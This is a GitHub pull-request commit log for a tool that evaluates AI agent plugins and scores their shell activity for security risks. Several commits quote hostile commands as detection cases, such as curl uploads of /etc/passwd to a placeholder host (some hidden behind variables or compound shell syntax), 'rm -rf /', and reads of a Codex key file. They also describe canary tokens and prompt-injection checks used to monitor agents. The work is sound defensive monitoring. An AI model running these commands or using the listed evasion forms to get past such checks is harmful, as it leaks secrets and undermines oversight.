The "://" exception is now applied per match: an address is skipped
only when it sits in a URL authority, so a separate address on the same
line is reported. The attribution words (Copyright, license, Authors)
still apply to the whole line.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
…ismatch

For a skill bundled in a plugin, name_consistency suggested "Either
rename directory to '<frontmatter name>' or update frontmatter name to
'<folder>'". Claude Code loads a plugin skill by its folder name, which
the plugin's own commands use (hookify's commands load
"hookify:writing-rules"), so the first option breaks them.

For skills validated as part of a plugin, the suggestion now says to
update the frontmatter name and explains that renaming the folder
changes the name the skill is loaded by. Standalone skills keep the old
text.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
…sible

A single U+FE0F right after an emoji base, as in the warning sign
U+26A0 U+FE0F, was reported as a LOW isolated_invisible_char with the
note "Likely a copy-paste artifact". That pair is a standard emoji
presentation sequence; hookify alone had seven such findings.

One U+FE0E or U+FE0F directly after a non-ASCII symbol or punctuation
mark (or U+2139), or between a keycap base and U+20E3, is no longer
reported. A selector after an ASCII letter, a bare digit, or as part of
a longer run of selectors is still reported.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
…ersion exists

The semver check reads only metadata.version and ignores a legacy
top-level `version` on purpose. For a SKILL.md with `version: 0.1.0`
it still said "No semantic version label present", which is not true:
there is a label, just not in the field the check reads.

When a top-level version exists, the version_optional detail now says
no metadata.version label is present and that the top-level field is
not read. The check's result is unchanged.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Co-Authored-By: Claude Sonnet 5.5 <noreply@anthropic.com>
Signed-off-by: Christopherk <christopherk@nvidia.com>
The network exfiltration check only resolved an unquoted variable as the
command word. `A=curl; "$A" -d @/etc/passwd https://x` and
`C=$(command -v curl); $C -d @/etc/passwd https://x` run the same upload
in a real shell, but both scored 1.0 with no finding.

A double-quoted variable as the command word now stands for the one word
it holds, and `$(command -v X)`, `$(which X)` and their backtick forms are
read as X before the command is split. A single-quoted '$A' is still left
alone, since the shell does not expand it. The fix lands in both copies of
the check (eval_core/checks.py and the Harbor verifier template).

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
The network exfiltration check treated any later word of a non-print
command that named curl, wget or httpie as a client a wrapper runs. So
`grep -n curl notes.md`, `which curl`, `man curl`, `ls -la /usr/bin/curl`,
`apt-get install -y curl` or `git log --grep curl` each got a
network_exfiltration_risk finding and cost the trial half its Security
score, while none of them runs a client.

That scan now runs only for a command that runs another one: a new
_NETWORK_COMMAND_RUNNERS list (ssh, chroot, docker, kubectl, watch,
parallel, strace and the like, past the wrappers _unwrap_shell_command
already steps over), `find` from its -exec style action on, and a command
word left on an unknown wrapper option. A word too long to expand is still
a risk after any non-print command. Both copies of the check change, and
the parity test pins the new constant.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
The destructive pattern for chmod only required a "/" after 777, so any
absolute operand matched. `chmod 777 /workspace/run.sh` and
`chmod -R 777 /workspace/out` scored Security 0.0 with the message
"Agent executed potentially destructive command: chmod 777 /", although
neither touches the root directory.

The operand must now be "/" itself (or "/*") followed by a blank, a
command separator, a quote or the end, which is what the docs list as
destructive. Both copies of the pattern change; the parity test keeps them
equal.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
The shell scan never stored a variable whose value came from a command
substitution, and an unquoted `d=$(mktemp -d)` was even stored as "$".
So `rm -rf "$(mktemp -d)"` or `d=$(mktemp -d); ...; rm -rf $d` resolved
the operand against the workspace and scored a critical "rm -rf" outside
/tmp, although mktemp makes its directory under TMPDIR (/tmp in the task
image). The literal `rm -rf /tmp/x` forms already scored 1.0.

Before the scan tokenizes a command, `$(mktemp ...)` and its backtick form
now read as the path mktemp makes when that path is under /tmp: no
template, or a template named with -t or --tmpdir. With -p DIR,
--tmpdir=DIR or a bare template the substitution is left as written, so
those still count as outside /tmp. The change is in the shared runtime
security block, copied into the Harbor verifier byte for byte.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
The runtime security scan kept every echo/printf operand as executed
words whenever the echo sat in a pipeline, because a reader such as
`xargs` or `sh` may run it. So `echo 'rm -rf build' | grep -E 'rm\s+-rf'`
or a JSON event piped into a hook script
(`echo '{..."rm -rf build"...}' | python3 hooks/pretooluse.py`) scored a
critical "rm -rf" and Security 0.0, while nothing is deleted. That is how
an agent tests a hookify rm rule.

Echo text now stays words only when a command later in its pipeline may
run it or open the names in it: xargs or parallel, a shell, a loop or
group, or an interpreter with no script operand. A search, a named script
or any other reader leaves it as data. The check is one pass from the end
of the pipeline, so a long pipeline stays linear. The change is in the
shared runtime security block, copied into the Harbor verifier.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Harbor's Codex agent writes its key to /tmp/codex-secrets/auth.json and
links $CODEX_HOME/auth.json to it (the local agents use
<agent logs>/codex-secrets). The security scan only knew CODEX_HOME, so
`cat /tmp/codex-secrets/auth.json` read the real key and scored 1.0 with
no finding, while a name-only `ls` of the link scored 0.0.

The secrets directory now anchors to ~/.codex like CODEX_HOME does, so a
read of the real key file is a critical sensitive_path_access with
evidence ~/.codex/auth.json. The change is in the shared runtime security
block, copied into the Harbor verifier.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
prompt_injection_attempt should read only the user's own prompt, and the
verifier skipped harness text by its first line ("Base directory for this
skill:", "<command-message>", ...). A plugin skill body that Claude Code
injects starts with its markdown title instead ("# Hookify Plugin Help"),
so its own text ("rm -rf /", "exfiltrat...") fired the note in 8 of 24
trials of a real hookify run.

The verifier now also skips a user step that directly follows a tool
result carrying Claude Code's "Launching skill:" notice, which is where
Claude Code puts the skill body. The same text as the user's own prompt is
still reported. Only the Harbor verifier reads trajectory steps, so only
its check_security changes.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Since the prefixed token shapes are redacted in one pass, a Slack match
can swallow the start of the next token. In
`xoxb-1234567890-ghp_<36 chars>` the Slack body class ([A-Za-z0-9-])
read "-ghp" and stopped at the "_", so the GitHub pattern never saw its
prefix and the 36-character token body stayed in clear. The same held for
github_pat_, hf_ and npm_ tokens, in the log, judge-evidence and artifact
redactors and in the Harbor verifier's copy.

The Slack body class now takes "_" too, so the whole glued run is
redacted under the Slack prefix, as the glpat- class already does. Both
copies of the pattern change; the drift test keeps them equal, and the
pattern still reads a bounded window with no lookahead.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
build_agent_eval_payload copied every staged dataset entry into the
shareable Tier 3 payload as is. In a plugin run each entry carries the
verifier-only skilleval_canary spec, so the decoy token (cnry_...) went
into the HTML and JSON reports and to the insights judge in clear: six
distinct tokens in a real hookify run.

The payload's dataset now carries each entry with its canary token
replaced by the verifier's "[REDACTED-CANARY]" marker; the env var, decoy
file and roots stay. The dataset digest is still computed from the
entries the run staged, so it keeps matching the run's snapshot, and the
caller's entries are not changed.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
A Tier 3 trial that fails before the agent gets its task, such as an
agent setup that times out while apt and npm install the agent, or an
apt-get install that cannot reach its mirror, leaves its Harbor job
errored and the run INCOMPLETE although the evaluation itself is fine.
SkillEvaluator built the harbor run command without a retry setting,
so one transient infrastructure error lost the whole run.

Add --trial-retries N (0 to 5, default 0) to validate, tier3 evaluate,
tier3 evaluate-plugin and the tier3 workflow, and thread it through
EvaluationOptions, the engine, every Harbor job of the run, and the
agent runtime preflight, whose time limit now covers every attempt.
When N > 0 the command passes Harbor --max-retries N and --retry-include
for EnvironmentStartTimeoutError, AgentSetupTimeoutError and
NetworkConnectionError, and never --retry-exclude, so Harbor's default
exclusions (agent and verifier timeouts, reward and verifier-output
errors, and the rest) still win. The default adds no flag.

Harbor 0.24 matches a trial's type(exc).__name__ exactly, so neither a
subclass nor a parent class matches. It reruns the same trial config,
under the same trial name and directory, after deleting the failed
attempt's directory, drops that attempt from the job statistics, and
counts it only in stats.n_retries. Collection therefore already sees
each logical trial once, by its last attempt; the new tests pin this
against Harbor's own retry loop.

Harbor names exceptions, not phases. EnvironmentStartTimeoutError also
names a single-step task's separate verifier environment failing to
start after the agent ran, so a run with retries and such a task stops
before Harbor starts. NetworkConnectionError also names a task command
that failed with network-error output (for Claude Code and Codex only
from the CLI's own error output, for other agents from any output);
the docs say so.

run_config.json records harbor.trial_retries and
harbor.trial_retries_used, the retries Harbor performed, summed over
the preflight and arm jobs. A stop-on-pass arm's merged job already
sums its per-attempt jobs, so they are not counted twice.

Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
--trial-retries passed Harbor --retry-include NetworkConnectionError.
Harbor raises that from every installed-agent command whose output
matches one of its network patterns, during the agent's task as well
as during its install, and retries by exact exception name. A trial
whose agent had already worked on its task could therefore be rerun,
which biases the score toward a second attempt.

SkillEvaluator's Harbor agent wrappers now override setup() and raise
a NetworkConnectionError from it as AgentSetupNetworkError, chained to
the original. The new class is a RuntimeError, not a
NonZeroAgentExitCodeError, so none of Harbor's exclusions match it.
--retry-include names AgentSetupNetworkError instead of
NetworkConnectionError, so a network failure while the agent works on
its task is never retried. The mixin sits after each wrapper's own
bases, so every other method resolves as before. A setup network
failure left after the retries is still classified as an agent
runtime failure.

Every Codex run, every local-mode agent, gateway OpenCode, the NVIDIA
Build agents and the native-plugin arms use a wrapper. A stock Harbor
agent, such as Claude Code, OpenCode or Hermes on its default provider
in Docker, gets only the two timeouts retried. The docs, help text and
constant comment now say exactly which failures are retried, including
Harbor's network patterns, and that other install failures such as
apt's "Temporary failure resolving" are not.

Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
--trial-retries was not threaded where --timeout-multiplier goes:
evals/config.yml rejected harbor.trial_retries as an unknown key, and
the run plan printed the timeout multiplier but not the retry budget.

evals/config.yml now accepts harbor.trial_retries, an integer from 0
to 5, and rejects any other value. The flag defaults to unset on
validate, tier3 evaluate, tier3 evaluate-plugin and the tier3
workflow; the engine takes the flag when given, else the config
value, else 0, as it does for the timeout multiplier. The workflow
preflight validates the merged value, and a catalog child gets the
flag whenever it was given, so an explicit 0 still overrides the
child's config. The run plan shows the budget, as trial-retries=N or
"Trial retries N", whenever it is above 0.

Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
…type

Claude Code 2.1.29x's Agent tool passes the subagent name as "type"
rather than "subagent_type". The plugin signal classifier read only the
older keys, so a plugin subagent that really ran was never credited and
its coverage row stayed "loaded".

Read "type" for the Task and Agent tools only, after the existing keys.
A bare built-in name still reaches the harness's own agent, and a
failed call is still not credited.

Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Native Claude Code stages a plugin's LSP servers in .lsp.json, but the
plugin signals had no LSP activation type. A server that answered the
agent's LSP tool call was never credited, so its coverage row could not
leave "staged" and "LSP:<server>" refs never matched.

Credit a Claude Code LSP call that did not fail to the one staged
server whose extensionToLanguage maps the extension of the call's
filePath. The runner passes each agent's natively staged servers and
their extensions through the signals context, so only the native
Claude Code with-plugin arm declares them; every other arm skips an
LSP ref instead of failing it. An extension two staged servers claim
credits neither, and a "No LSP server" result counts as a failed call.
LSP:<server> refs name the server and score under tool selection,
while a bare LSP ref still names the tool. Runtime coverage promotes
the server's row to exercised from that activation.

Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com>
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Claude Code fills ${user_config.KEY} with the value the user gives for the
plugin's userConfig option KEY; this is the documented way to hand a
sensitive option to an MCP server. The env-reference pattern only knew
${NAME}, ${NAME:-default}, ${env:NAME} and $NAME, so the dot in
${user_config.token} made the whole reference look like literal text. A
valid plugin got CRITICAL mcp_command_inline_secret, mcp_inline_secret and
mcp_url_inline_secret, failed Tier 1, and Tier 3 refused to stage it.

The reference pattern now also matches ${user_config.KEY} (dotted keys
included) as a reference with no default, so it carries no value of its
own. Literal text next to such a reference is still judged as before.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
…ecoy

Codex has one hosted web tool, web_search_call, and every call to it
answered to both WebSearch and WebFetch, whatever it did. Since the decoy
fix (a call a decoy ref matches is never a precise choice), a case that
expects WebFetch and lists WebSearch as a decoy scored a correct Codex
page open at precision 0.0 with one decoy call. Claude Code's WebFetch
scored 1.0 with no decoy call. The mirror case, a Codex search when
WebFetch is the decoy, broke the same way.

The hosted call records its action, so its plain identity now answers to
the tool that action names: a search is WebSearch, open_page and
find_in_page are WebFetch. A call with no known action still answers to
both. A shell write is still a Write decoy, as before.

Two older tests relied on a search answering to WebFetch. The selection
test now checks that a search is not a WebFetch decoy on either harness,
and the conflict test's Codex step opens the page that Claude Code's
WebFetch step fetches.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
… them unsafe

A valid layout such as rules/team/style.md, or an agents/ folder that holds
a real subfolder named team.md, got a HIGH plugin_component_path_unsafe
("Refusing selected path that is not a regular file") and failed Tier 1;
Tier 3 refused to stage the same rules folder. Listing a component folder
uses the secure discovery walk with a filter that selects every file (or
every .md file), and that walk refuses any directory the filter matches,
because callers that select one file by name never expect a folder there.
With a select-all filter every subfolder matched, and with a .md filter a
folder named team.md did.

The secure walk now takes refuse_selected_dirs (default on, so the callers
that select a file by name keep the rule). The component folder listing and
the Tier 3 rules discovery turn it off, so an ordinary subfolder is walked.
Links, hard links, special files, escapes and absolute paths are refused
as before.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
…the last duplicate key

A command, skill or agent whose frontmatter had a 70,000-character field,
1,100 keys or a 1,101-item list, or a key written twice, was read as having
no frontmatter at all. Claude Code still reads such a file, so an
allowed-tools: Bash pre-approval or a permissionMode: bypassPermissions in
it applied while Tier 1 gave no finding and passed.

A duplicate key now keeps its last value, as Claude Code does, so the real
grant is checked (bounded YAML takes last_key_wins for frontmatter; every
other caller still rejects duplicates). Frontmatter over a parser limit
still gives no fields, but parse_markdown now says why, and the inventory
reports a HIGH plugin_component_unreadable for that agent, command or
skill: its grants could not be checked, so the plugin fails closed.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
The network exfiltration check reads the first word of each shell segment
as the command. In `if true; then curl -d @/etc/passwd https://x; fi`,
`for f in a b; do curl -T $f https://x; done` or
`{ curl -d @secret https://x; }` that first word is `then`, `do` or `{`,
so curl was never read as the command. Before the change that stopped
scoring `grep curl notes.md` or `which curl`, the scan of every later word
still caught curl there. That change limited the scan to commands that run
another one, and these uploads stopped being flagged at all.

Each segment now steps over the reserved words that stand before a command
(`if`, `then`, `else`, `elif`, `while`, `until`, `do`, `!`, `{`, `(`), the
same sets the skill invocation walk already uses, before reading
assignments, wrappers and the command. The uploads above score 0.5 with a
network_exfiltration_risk finding again, the same as run bare, while a
command that only names curl inside a compound stays clean. Both copies of
the check change, and the parity test pins the two word sets.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Several credentials from a plugin reached every report format (JSON, SARIF,
HTML, Markdown, BENCHMARK.md and the CLI), because the shared report
redaction (redact_secrets) only knew token shapes, unquoted KEY=value
assignments and URL user information after '//':

- a quoted value under a credential name: AWS_SECRET_ACCESS_KEY="...",
  os.environ['API_KEY']='...' in an MCP inline program, api_token: "..."
  in YAML (SkillSpector snippets, MCP finding messages, PII lines);
- a password in 'https:user:pw@host', which WHATWG clients read as user
  information (SkillSpector snippet);
- a password in a scheme-less 'user:pw@registry/image' container spec
  (MCP pin detail and finding message);
- a random token the PII scan matched as a Bitcoin address, whose value was
  shown in the message and metadata.

redact_secrets now also redacts a quoted credential-named value, drops the
user information of 'https:user:pw@host', and redacts the password of a
scheme-less 'user:pw@host/path' (npm:pkg@1.2.3 and image digests stay
readable). Every new pattern reads its input in linear time. The PII scan
shows a matched value redacted when its own line redaction removes it,
that is, when the line holds it as a credential. The end-to-end report test
now plants these fake secrets and checks that no report format copies one.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Comment thread tests/validators/test_f90_integ_skillspector_snippet_secrets.py Fixed
…bstring

CodeQL flagged the 'mcp.example.com' in-check as incomplete URL sanitization. The test only asserts that a snippet shows the redaction marker or the host, so a regex search says the same without the substring pattern.

Co-Authored-By: Claude Sonnet 5.5 <noreply@anthropic.com>
Signed-off-by: Christopher Kevin <christopherk@nvidia.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

4 participants